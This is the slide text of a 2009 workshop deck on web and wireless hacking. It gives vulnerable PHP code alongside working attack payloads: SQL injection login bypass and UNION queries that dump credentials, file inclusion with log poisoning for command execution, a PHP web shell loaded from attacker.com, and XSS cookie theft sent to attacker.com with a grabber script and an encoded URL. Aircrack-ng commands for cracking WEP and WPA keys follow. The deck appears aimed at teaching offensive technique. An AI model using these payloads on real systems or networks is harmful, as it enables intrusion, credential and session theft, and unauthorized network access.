Web & Wireless Hacking

2,070 views

Published on

Complete Guide on Web & Wireless Hacking

Published in: Technology
  • Be the first to comment

Web & Wireless Hacking

  1. 1. IPSECS WEB & WIRELESS HACKING Don “df0x” Anto Makasar, Juni 2009 www.ipsecs.com
  2. 2. IPSECS Content • Introduction • Web Exploitation – SQL Injection – File Inclussion – XSS • Breaking Wireless Infrastructure – War Driving – Exploiting Wireless Network www.ipsecs.com
  3. 3. IPSECS Introduction • Don “df0x” Anto • IT security researcher • Hacker?? Not, but IT security researcher • Contact – we@ipsecs.com • URL – http://ipsecs.com – http://kandangjamur.net • Bachelor degree in Electrical engineering • Add my facebook dj.antoxz@gmail.com www.ipsecs.com
  4. 4. IPSECS st 1 Day, WEB HACKING www.ipsecs.com
  5. 5. IPSECS Web Exploitation • Its exploiting web application programming flaws. • Programming mistakes are always happen. • Targeting clients or servers. • Possible to steal databases and other sensitif informations, steal cookie or session, execute arbitrary commands, or fully compromise the system. • Its easy to do. Google helps you :). www.ipsecs.com
  6. 6. IPSECS Common Web Exploitation • SQL Injection, an attack whichs targeting sensitive information in database server. Possible to compromise system. • File Inclussion, an attack which usually to gain shell access on the remote target. – Local file inclussion – Remote file inclussion • Cross Site Scripting (XSS), an attack which targeting user or client of vulnerable website. – Doom – Persistent – Non-persistent www.ipsecs.com
  7. 7. IPSECS SQL INJECTION www.ipsecs.com
  8. 8. IPSECS SQL Injection • Injecting malicious SQL query to take profits. • Usually is used to bypass login, steal sensitive information on database. Further attack can be used in fully compromising system. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
  9. 9. IPSECS SQL Injection in login form • User input in login form is not validated before to be executed in database. • Attacker is possible to send arbitrary SQL query through login form and bypassing login process. • Attacker can also execute other SQL query. www.ipsecs.com
  10. 10. IPSECS Vulnerable Code • Example vulnerable code in login process: $pass = md5($_POST[password]); $query = "SELECT * FROM tblUser WHERE username = " . $_POST[username] . " AND password = " . $pass . ""; $q = mysql_query($query); • Username whichs sent from login form is not validated. www.ipsecs.com
  11. 11. IPSECS Exploit Login • Exploit code: username = admin OR a=a password = terserah • SQL query to be executed by database server is: SELECT * FROM tblUser WHERE username = admin OR a=a AND password = e00b29d5b34c3f78df09d45921c9ec47 www.ipsecs.com
  12. 12. IPSECS SQL Injection in login form www.ipsecs.com
  13. 13. IPSECS SQL Logic • AND operator is executed before OR, result of query is: a=a AND password = e00b29d5b34c3f78df09d45921c9ec47 • Boolean logic result is FALSE, then: username = admin OR FALSE • Boolean logic result is TRUE (admin). • Attacker successfully bypassing login form. www.ipsecs.com
  14. 14. IPSECS SQL Injection in URI parameter • Parameter input in URI is not validated before to be executed in database. • Attacker is possible to send arbitrary SQL query by modifying parameter input. www.ipsecs.com
  15. 15. IPSECS Vulnerable Code • Example vulnerable code while inputing URI parameters: $query = "SELECT * FROM news WHERE id=" . $_GET[aid] ; $q = mysql_query($query); • Parameter aid whichs taken from URI is not validated. www.ipsecs.com
  16. 16. IPSECS Exploiting SQL Injection • Checking vulnerability using AND logic http://example.com/news.php?aid=1 AND 1=1-- http://example.com/news.php?aid=1 AND 1=0-- • Knowing number of field using UNION SELECT http://example.com/news.php?aid=1 UNION SELECT 1-- http://example.com/news.php?aid=1 UNION SELECT 1,2-- http://example.com/news.php?aid=1 UNION SELECT 1,2,3,..,n-- www.ipsecs.com
  17. 17. IPSECS Knowing Number of Field www.ipsecs.com
  18. 18. IPSECS SQL Injection in URI parameter • In Case table which generates “news” contains 3 fields www.ipsecs.com
  19. 19. IPSECS Exploiting SQL Injection • Knowing tables in database http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()-- • Knowing fields in table tblUser http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=tblUser-- OR IN HEXAL http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x74626c55736572-- www.ipsecs.com
  20. 20. IPSECS Knowing Tables in DB www.ipsecs.com
  21. 21. IPSECS Exploiting SQL Injection • Viewing information in tables http://example.com/news.php?aid=-1 UNION SELECT 1,2,CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser-- • Viewing arbitrary files (if FILE access is granted) http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(/etc/passwd)-- OR IN HEXAL http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(0x2f6574632f706173737764)-- www.ipsecs.com
  22. 22. IPSECS Viewing Table Records www.ipsecs.com
  23. 23. IPSECS FILE INCLUSSION www.ipsecs.com
  24. 24. IPSECS File Inclussion • Including malicious or sensitive file to be executed by server. • Usually is used to steal sensitive information, execute arbitrary command, or compromise system. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
  25. 25. IPSECS Local File Inclussion • Including sensitive file in local server (vulnerable server) to be executed by server. • Usually is used to steal sensitive information, execute arbitrary command. Further attack can be used in fully compromising system. • User input is not well validated or no sanitation process. www.ipsecs.com
  26. 26. IPSECS Vulnerable Code • Example vulnerable code: define(DOCROOT, /var/www/html/modules); $filename = DOCROOT . "/" . $_GET[module] . ".php"; include($filename); • Parameter module whichs taken from URI is not validated. www.ipsecs.com
  27. 27. IPSECS Viewing Sensitive Files • Exploit code to viewing sensitive files on vulnerable system: http://example.com/index.php?module=../../../../../../../etc/passwd%00 http://example.com/index.php?module=../../../../../../../etc/group%00 www.ipsecs.com
  28. 28. IPSECS File /etc/passwd www.ipsecs.com
  29. 29. IPSECS Placing Malicious Log • Placing malicious apache log uses telnet to inject system command: $ telnet example.com 80 Trying example.com... Connected to example.com. Escape character is ^]. GET /<?php passthru($_GET[cmd]) ?> HTTP/1.1 Host:example.com www.ipsecs.com
  30. 30. IPSECS Malicious Log www.ipsecs.com
  31. 31. IPSECS Executing Command • Executing command via access_log apache (in case apache log is readable) http://example.com/index.php? module=../../../../../../../usr/local/apache/logs/access_log %00&cmd=uname -a http://example.com/index.php? module=../../../../../../../usr/local/apache/logs/access_log %00&cmd=id www.ipsecs.com
  32. 32. IPSECS Command “id” www.ipsecs.com
  33. 33. IPSECS Remote File Inclussion • Including sensitive file in remote server (attacker server) to be executed by server. • Usually to execute arbitrary command using web shell. Further attack can be used in fully compormising system. • User input is not well validated or no sanitation process. www.ipsecs.com
  34. 34. IPSECS Vulnerable Code • Example vulnerable code: $filename = $_GET[page] . ".php"; include($filename); • Parameter page whichs taken from URI is not validated. www.ipsecs.com
  35. 35. IPSECS PHP Shell • Simple web shell: <?php /*Basic PHP web shell injek.txt*/ if(isset($_GET[exec])){ if(!empty($_GET[exec])){ $cmd = $_GET[exec]; if(function_exists(passthru)){ passthru($cmd); } } } ?> www.ipsecs.com
  36. 36. IPSECS Public PHP Shell • Widely known web shell : r57, c99 • Commonly used in exploiting remote file inclussion. www.ipsecs.com
  37. 37. IPSECS r57 www.ipsecs.com
  38. 38. IPSECS Executing Command • Injecting command: http://example.com/view.php? page=http://attacker.com/injek.txt&exec=id http://example.com/view.php? page=http://attacker.com/injek.txt&exec=ls -al www.ipsecs.com
  39. 39. IPSECS Command ls -al www.ipsecs.com
  40. 40. IPSECS CROSS SITE SCRIPTING www.ipsecs.com
  41. 41. IPSECS Cross Site Scripting • Inserting HTML/java script code to be executed by client browser which views vulnerable website. • Usually is used in stealing cookie on computer client, phising, and tricking user to download arbitrary file. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
  42. 42. IPSECS Cross Site Scripting • Doom based XSS, XSS in vulnerable file which comes from default installed software. • Non-Persistent XSS, XSS in vulnerable web page which can be exploited by tricking user to click malicious URI. Characteristic : temporal. • Persistent XSS, XSS in vulnerable web page which can be exploited to insert malicious code to database. Characteristic : permanent. www.ipsecs.com
  43. 43. IPSECS Vulnerable Code • Example vulnerable code: echo "<pre> Searching for ". $_GET[key] . "...</pre><br/>n"; • Parameter key whichs sent from search form is not validated. www.ipsecs.com
  44. 44. IPSECS Cross Site Scripting • Checking if XSS vulnerable: http://example.com/search.php?key=<script>alert(XSS found dude!)</script> www.ipsecs.com
  45. 45. IPSECS Cross Site Scripting www.ipsecs.com
  46. 46. IPSECS Cookie Stealing • Stealing cookie: http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script> • Content payload.js document.location="http://attacker.com/cookie-save.php? c="+document.cookie www.ipsecs.com
  47. 47. IPSECS Cookie Grabber • Content of cookie-save.php: <?php /*Cookie stealer*/ $f = fopen(/tmp/cookie.txt, a); $date = date("j F, Y, g:i a"); fwrite($f, "IP Address : ". $_SERVER[REMOTE_ADDR] ."n". "Cookie : ". $_GET[c] ."n". "Date and Time : ". $date ."n". "nn"); fclose($f); ?> www.ipsecs.com
  48. 48. IPSECS Hexal Encoding • Anonymize malicious URI using hexal encoding: http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script> HEXAL ENCODING http://example.com/search.php?key=%3c %73%63%72%69%70%74%20%73%72%63%3d %22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b %65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e %6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e www.ipsecs.com
  49. 49. IPSECS DEMO - Q&A WEB HACKING www.ipsecs.com
  50. 50. IPSECS THANK YOU! www.ipsecs.com
  51. 51. IPSECS nd 2 Day, WIRELESS HACKING www.ipsecs.com
  52. 52. IPSECS Wireless Network • Now, is widely used in campus, government, company, and many public places. • Provide network for mobile devices. • More flexible than wired network. • More insecure than wired network, so here we go! www.ipsecs.com
  53. 53. IPSECS War Driving • Activity to search Wi-Fi wireless network. • Public tools to do War Driving – Windows : NetStumbler, Wireshark – Linux : Kismet, AirCrack-ng, AirSnort, Wireshark – OSX : KisMac • Im using Linux Ubuntu 8.10. www.ipsecs.com
  54. 54. IPSECS Kismet • Console based 802.11 wireless network detector and sniffer. • It identifies wireless network by pasively sniffing. • Its already exist on Ubuntu Repository or you can download from www.kismetwireless.net. • Use apt-get install kismet on Ubuntu, read the README if you want to install from source. www.ipsecs.com
  55. 55. IPSECS Kismet www.ipsecs.com
  56. 56. IPSECS Kismet www.ipsecs.com
  57. 57. IPSECS Kismet www.ipsecs.com
  58. 58. IPSECS AirSnort • GUI based 802.11 wireless network detector. • Designed for WEP Cracker. • It isnt ready on my Ubuntu repository, download from www.sourceforge.net. • Read the README to install. www.ipsecs.com
  59. 59. IPSECS aircrack-ng (formerly : aircrack) • Console based 802.11 wireless network detector. • Designed for WEP & WPA-PSK Cracker. • Its already exist on Ubuntu repository or you can downlod from www.aircrack-ng.org. • Use apt-get install aircrack-ng on Ubuntu, read the README if you want to install from source. www.ipsecs.com
  60. 60. IPSECS aircrack-ng (formerly : aircrack) airodump wlan0 www.ipsecs.com
  61. 61. IPSECS Wireshark • GUI based network protocol analyzer for UNIX and Windows. • The most complete protocol analyzer which support many data communication protocols. • Its already exist on Ubuntu repository or you can download from www.wireshark.org. • Use apt-get install wireshark on Ubuntu,read the README if you want to install from source. www.ipsecs.com
  62. 62. IPSECS Wireshark www.ipsecs.com
  63. 63. IPSECS NetStumbler • Best known windows tool to find wireless networks. • It is function like Kismet on linux or KisMac on OSX. • You can download NetStumbler in www.netstumbler.com • Since I use ubuntu, theres no demo for this tool. www.ipsecs.com
  64. 64. IPSECS NetStumbler www.ipsecs.com
  65. 65. IPSECS Wireless Network Protection • MAC Filtering • WEP (Wired Equivalent Privacy) • WPA (Wi-Fi Protected Access) • WPA2 (Wi-Fi Protected Access 2) • Captive Portal www.ipsecs.com
  66. 66. IPSECS Exploiting Wireless Network • Miss Configuration (Human Error) • Spoofing • Cracking Protection • Denial of Service www.ipsecs.com
  67. 67. IPSECS Miss Configuration • Default Configuration on Device (Access Point) • Default Username & Password • Default Range IP Address • SNMP public & private community • No encryption enabled www.ipsecs.com
  68. 68. IPSECS Spoofing & Rogue AP • Spoofing MAC address to bypass MAC filtering. • Tools – Linux : ifconfig – Windows : smac, regedit • Creating Rogue AP to trick wireless user, then doing Man in The Middle and sniffing. • Tools – airsnarf http://airsnarf.shmoo.com www.ipsecs.com
  69. 69. IPSECS MAC Spoofing www.ipsecs.com
  70. 70. IPSECS WEP Cracking • WEP is based on RC4 algorithm and CRC32. • Collecting as much as possible weak IV (Insialization Vector) to be used in FMS attack. • Accelerated collecting IV using traffic injection. • Tools : aircrack-ng, AirSnort www.ipsecs.com
  71. 71. IPSECS WEP Cracking • Start interface on Monitor mode. • Run kismet to find AP target. • Find AP with connected clients on it. Or do fake authentication to associate with AP if no client connected. • Inject packet using aireplay-ng • Dump packet using airodump-ng • Crack dumped file using aircrack-ng www.ipsecs.com
  72. 72. IPSECS Dumping Packet airodump-ng -c 11 --bssid 00:1c:10:b3:59:38 -w /tmp/output wlan0 www.ipsecs.com
  73. 73. IPSECS Cracking Key aircrack-ng -z -b 00:1c:10:b3:59:38 /tmp/output-01.cap Key is “abcdef1234” www.ipsecs.com
  74. 74. IPSECS WPA Cracking • WPA is based on RC4 algorithm + TKIP/AES • WPA-PSK can be attack using dictionary attack. • Of course, it needs dictionary • Can be cracked when offline • Tools : aircrack-ng www.ipsecs.com
  75. 75. IPSECS WPA Cracking • Start interface on Monitor mode. • Run kismet to find AP target. • Find AP with which,s protected by WPA. • Dump packet using airodump-ng • Wait for a client to authenticate to AP, or deauthenticate client whichs connected to AP. • Crack dumped file using aircrack-ng www.ipsecs.com
  76. 76. IPSECS WPA Cracking airodump-ng -c 11 --bssid 00:21:29:79:50:F1 -w /tmp/out-psk wlan0 www.ipsecs.com
  77. 77. IPSECS WPA Cracking aircrack-ng -w /usr/share/dict/words -b 00:21:29:79:50:F1 /tmp/out-psk*.cap Key is “miko2009” www.ipsecs.com
  78. 78. IPSECS Denial of Service • Making wireless network unavailable. • Tools : airjack, void11, aircrack www.ipsecs.com
  79. 79. IPSECS DEMO - Q&A WIRELESS HACKING www.ipsecs.com
  80. 80. IPSECS THANK YOU! www.ipsecs.com

×